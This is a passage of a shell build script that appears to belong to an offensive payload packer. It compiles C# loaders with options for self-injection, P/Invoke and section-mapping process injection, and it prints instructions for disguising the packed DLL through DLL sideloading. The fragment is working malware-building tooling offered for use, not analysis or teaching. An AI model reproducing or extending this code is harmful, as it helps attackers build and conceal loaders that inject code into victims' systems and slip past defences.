DOTNET_FLAGS="$DOTNET_FLAGS -define:_DEBUG_"
fi &&
if [ $SELF = true ]; then
DOTNET_FLAGS="$DOTNET_FLAGS -define:SELFINJECT"
fi &&
if [ $RX = true ]; then
DOTNET_FLAGS="$DOTNET_FLAGS -define:RX"
fi &&
case $OUTPUT_FORMAT in
dotnet)
mcs $DOTNET_FLAGS -out:$BLOB.packed.$OUTPUT_EXTENSION $INSTALL_DIR/dotnet/*.cs $TMP_DIR/Global.cs
;;
dotnet-pinvoke)
DOTNET_FLAGS="$DOTNET_FLAGS -define:PINVOKE"
mcs $DOTNET_FLAGS -out:$BLOB.packed.$OUTPUT_EXTENSION $INSTALL_DIR/dotnet/Program.cs $TMP_DIR/Global.cs
;;
dotnet-createsection)
DOTNET_FLAGS="$DOTNET_FLAGS -define:MAPVIEWOFSECTION"
mcs $DOTNET_FLAGS -out:$BLOB.packed.$OUTPUT_EXTENSION $INSTALL_DIR/dotnet/*.cs $TMP_DIR/Global.cs
;;
esac
;;
esac &&
#rm -rf $TMP_DIR &&
echo -n '[!] Done! Check '; file $BLOB.packed.$OUTPUT_EXTENSION &&
if [ $OUTPUT_FORMAT = "dll" -o $OUTPUT_FORMAT = "service-dll" -o $OUTPUT_FORMAT == "reflective-dll" ] && [ $DLL_SIDELOAD != false ]; then
cp "$DLL_SIDELOAD" "$OUTPUT_DIR/$NEW_DLL_NAME" &&
echo "[?] Rename $BLOB.packed.$OUTPUT_EXTENSION to $ORIGINAL_DLL and copy in the same directory $NEW_DLL_NAME"
fi